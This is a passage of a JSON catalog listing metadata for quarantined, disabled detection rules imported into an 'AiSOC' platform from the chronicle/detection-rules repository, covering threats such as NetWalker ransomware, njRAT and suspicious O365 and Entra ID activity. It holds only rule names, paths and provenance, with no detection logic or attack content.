"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/netntlm-downgrade-attack-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "netntlm_downgrade_attack_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/netntlm_downgrade_attack_part_2.yaral" } }, { "id": "chronicle-detection-rules-netsh-rdp-port-forwarding", "type": "detection", "name": "netsh_rdp_port_forwarding", "description": "netsh_rdp_port_forwarding", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/netsh-rdp-port-forwarding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "netsh_rdp_port_forwarding", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/microsoft_sysmon/netsh_rdp_port_forwarding.yaral" } }, { "id": "chronicle-detection-rules-netwalker-ransomware-detection", "type": "detection", "name": "netwalker_ransomware_detection", "description": "netwalker_ransomware_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/netwalker-ransomware-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "netwalker_ransomware_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/netwalker_ransomware_detection.yaral" } }, { "id": "chronicle-detection-rules-netwire-rat-detection-via-wscript", "type": "detection", "name": 
"netwire_rat_detection_via_wscript", "description": "netwire_rat_detection_via_wscript", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/netwire-rat-detection-via-wscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "netwire_rat_detection_via_wscript", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/netwire_rat_detection_via_wscript.yaral" } }, { "id": "chronicle-detection-rules-network-connection-first-seen-in-past-day", "type": "detection", "name": "network_connection_first_seen_in_past_day", "description": "network_connection_first_seen_in_past_day", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/network-connection-first-seen-in-past-day.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "network_connection_first_seen_in_past_day", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/community/threat_intel/network_connection_first_seen_in_past_day.yaral" } }, { "id": "chronicle-detection-rules-network-connection-tor-exit-nodes", "type": "detection", "name": "network_connection_tor_exit_nodes", "description": "network_connection_tor_exit_nodes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/network-connection-tor-exit-nodes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "network_connection_tor_exit_nodes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/network_connection_tor_exit_nodes.yaral" } }, { "id": "chronicle-detection-rules-network-http-low-prevalence-domain-access", "type": "detection", "name": "network_http_low_prevalence_domain_access", "description": "network_http_low_prevalence_domain_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/network-http-low-prevalence-domain-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "network_http_low_prevalence_domain_access", "source_commit": "74dd490", "license": "Apache-2.0", 
"license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/network_http_low_prevalence_domain_access.yaral" } }, { "id": "chronicle-detection-rules-network-traffic-to-specific-country", "type": "detection", "name": "network_traffic_to_specific_country", "description": "network_traffic_to_specific_country", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/network-traffic-to-specific-country.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "network_traffic_to_specific_country", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/network/network_traffic_to_specific_country.yaral" } }, { "id": "chronicle-detection-rules-new-run-key-pointing-to-suspicious-folder", "type": "detection", "name": "new_run_key_pointing_to_suspicious_folder", "description": "new_run_key_pointing_to_suspicious_folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/new-run-key-pointing-to-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"chronicle/detection-rules", "source_id": "new_run_key_pointing_to_suspicious_folder", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/new_run_key_pointing_to_suspicious_folder.yaral" } }, { "id": "chronicle-detection-rules-new-user-created-via-net-exe", "type": "detection", "name": "new_user_created_via_net_exe", "description": "new_user_created_via_net_exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/new-user-created-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "new_user_created_via_net_exe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/new_user_created_via_net_exe.yaral" } }, { "id": "chronicle-detection-rules-njrat-cc-post-request", "type": "detection", "name": "njrat_cc_post_request", "description": "njrat_cc_post_request", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/njrat-cc-post-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "njrat_cc_post_request", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/njrat_c_c_post_request.yaral" } }, { "id": "chronicle-detection-rules-njrat-ratbackdoor-proxy", "type": "detection", "name": "njrat_ratbackdoor_proxy", "description": "njrat_ratbackdoor_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/njrat-ratbackdoor-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "njrat_ratbackdoor_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/njrat_rat_backdoor__proxy.yaral" } }, { "id": "chronicle-detection-rules-north-korean-tunneling-tool-electricfish-detection-ar19129a", "type": "detection", "name": "north_korean_tunneling_tool__electricfish_detection_ar19129a", "description": "north_korean_tunneling_tool__electricfish_detection_ar19129a", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/north-korean-tunneling-tool-electricfish-detection-ar19129a.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "north_korean_tunneling_tool__electricfish_detection_ar19129a", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/north_korean_tunneling_tool___electricfish_detection___ar19_129a.yaral" } }, { "id": "chronicle-detection-rules-notepadexe-dll-search-order-hijackingsysmon", "type": "detection", "name": "notepadexe_dll_search_order_hijackingsysmon", "description": "notepadexe_dll_search_order_hijackingsysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/notepadexe-dll-search-order-hijackingsysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "notepadexe_dll_search_order_hijackingsysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/notepad___exe_dll_search_order_hijacking_sysmon.yaral" } }, { "id": "chronicle-detection-rules-o365-add-user-to-admin-role", "type": "detection", "name": "o365_add_user_to_admin_role", "description": "o365_add_user_to_admin_role", "version": "1.0.0", "author": "AiSOC", 
"tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-add-user-to-admin-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_add_user_to_admin_role", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_add_user_to_admin_role.yaral" } }, { "id": "chronicle-detection-rules-o365-admin-login-activity-to-uncommon-mscloud-apps", "type": "detection", "name": "o365_admin_login_activity_to_uncommon_mscloud_apps", "description": "o365_admin_login_activity_to_uncommon_mscloud_apps", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-admin-login-activity-to-uncommon-mscloud-apps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_admin_login_activity_to_uncommon_mscloud_apps", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_admin_login_activity_to_uncommon_mscloud_apps.yaral" } }, { "id": 
"chronicle-detection-rules-o365-adpowershell-app-login-subsequent-activity", "type": "detection", "name": "o365_ADPowerShell_app_login_subsequent_activity", "description": "o365_ADPowerShell_app_login_subsequent_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-adpowershell-app-login-subsequent-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_ADPowerShell_app_login_subsequent_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_ADPowerShell_app_login_subsequent_activity.yaral" } }, { "id": "chronicle-detection-rules-o365-entra-id-app-modify-permission-change-on-watchlist", "type": "detection", "name": "o365_entra_id_app_modify_permission_change_on_watchlist", "description": "o365_entra_id_app_modify_permission_change_on_watchlist", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-entra-id-app-modify-permission-change-on-watchlist.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_entra_id_app_modify_permission_change_on_watchlist", 
"source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_entra_id_app_modify_permission_change_on_watchlist.yaral" } }, { "id": "chronicle-detection-rules-o365-entra-id-app-permissions-percent-threshold-exceeded", "type": "detection", "name": "o365_entra_id_app_permissions_percent_threshold_exceeded", "description": "o365_entra_id_app_permissions_percent_threshold_exceeded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-entra-id-app-permissions-percent-threshold-exceeded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_entra_id_app_permissions_percent_threshold_exceeded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_entra_id_app_permissions_percent_threshold_exceeded.yaral" } }, { "id": "chronicle-detection-rules-o365-entra-id-app-permissions-threshold-exceeded", "type": "detection", "name": "o365_entra_id_app_permissions_threshold_exceeded", "description": "o365_entra_id_app_permissions_threshold_exceeded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/o365-entra-id-app-permissions-threshold-exceeded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_entra_id_app_permissions_threshold_exceeded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_entra_id_app_permissions_threshold_exceeded.yaral" } }, { "id": "chronicle-detection-rules-o365-entra-id-application-creation", "type": "detection", "name": "o365_entra_id_application_creation", "description": "o365_entra_id_application_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-entra-id-application-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_entra_id_application_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_entra_id_application_creation.yaral" } }, { "id": "chronicle-detection-rules-o365-entra-id-client-secret-add-update-delete-in-app", "type": "detection", "name": "o365_entra_id_client_secret_add_update_delete_in_app", "description": "o365_entra_id_client_secret_add_update_delete_in_app", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-entra-id-client-secret-add-update-delete-in-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_entra_id_client_secret_add_update_delete_in_app", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_entra_id_client_secret_add_update_delete_in_app.yaral" } }, { "id": "chronicle-detection-rules-o365-group-creation-failure", "type": "detection", "name": "o365_group_creation_failure", "description": "o365_group_creation_failure", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-group-creation-failure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_group_creation_failure", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_group_creation_failure.yaral" } }, { "id": "chronicle-detection-rules-o365-group-creation-success", "type": "detection", "name": "o365_group_creation_success", "description": "o365_group_creation_success", "version": "1.0.0", "author": 
"AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-group-creation-success.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_group_creation_success", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_group_creation_success.yaral" } }, { "id": "chronicle-detection-rules-o365-group-modification-add-member-success", "type": "detection", "name": "o365_group_modification_add_member_success", "description": "o365_group_modification_add_member_success", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-group-modification-add-member-success.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_group_modification_add_member_success", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_group_modification_add_member_success.yaral" } }, { "id": "chronicle-detection-rules-o365-group-modification-add-member-success-threshold", "type": "detection", 
"name": "o365_group_modification_add_member_success_threshold", "description": "o365_group_modification_add_member_success_threshold", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-group-modification-add-member-success-threshold.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_group_modification_add_member_success_threshold", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_group_modification_add_member_success_threshold.yaral" } }, { "id": "chronicle-detection-rules-o365-group-modification-remove-member-success", "type": "detection", "name": "o365_group_modification_remove_member_success", "description": "o365_group_modification_remove_member_success", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-group-modification-remove-member-success.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_group_modification_remove_member_success", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_group_modification_remove_member_success.yaral" } }, { "id": "chronicle-detection-rules-o365-logging-disabled", "type": "detection", "name": "o365_logging_disabled", "description": "o365_logging_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-logging-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_logging_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_logging_disabled.yaral" } }, { "id": "chronicle-detection-rules-o365-logging-enabled", "type": "detection", "name": "o365_logging_enabled", "description": "o365_logging_enabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-logging-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_logging_enabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_logging_enabled.yaral" } }, { "id": "chronicle-detection-rules-o365-login-activity-to-azure-ad-powershell-app", "type": "detection", "name": "o365_login_activity_to_azure_ad_powershell_app", "description": "o365_login_activity_to_azure_ad_powershell_app", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-login-activity-to-azure-ad-powershell-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_login_activity_to_azure_ad_powershell_app", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_login_activity_to_azure_ad_powershell_app.yaral" } }, { "id": "chronicle-detection-rules-o365-login-activity-to-uncommon-mscloud-apps", "type": "detection", "name": "o365_login_activity_to_uncommon_mscloud_apps", "description": "o365_login_activity_to_uncommon_mscloud_apps", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-login-activity-to-uncommon-mscloud-apps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_login_activity_to_uncommon_mscloud_apps", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_login_activity_to_uncommon_mscloud_apps.yaral" } }, { "id": "chronicle-detection-rules-o365-onedrive-anonymous-file-accessed", "type": "detection", "name": "o365_onedrive_anonymous_file_accessed", "description": "o365_onedrive_anonymous_file_accessed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-onedrive-anonymous-file-accessed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_onedrive_anonymous_file_accessed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_onedrive_anonymous_file_accessed.yaral" } }, { "id": "chronicle-detection-rules-o365-onedrive-anonymous-filedownload", "type": "detection", "name": "o365_onedrive_anonymous_filedownload", "description": "o365_onedrive_anonymous_filedownload", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/o365-onedrive-anonymous-filedownload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_onedrive_anonymous_filedownload", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_onedrive_anonymous_file_download.yaral" } }, { "id": "chronicle-detection-rules-o365-onedrive-anonymous-link-accessed", "type": "detection", "name": "o365_onedrive_anonymous_link_accessed", "description": "o365_onedrive_anonymous_link_accessed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-onedrive-anonymous-link-accessed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_onedrive_anonymous_link_accessed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_onedrive_anonymous_link_accessed.yaral" } }, { "id": 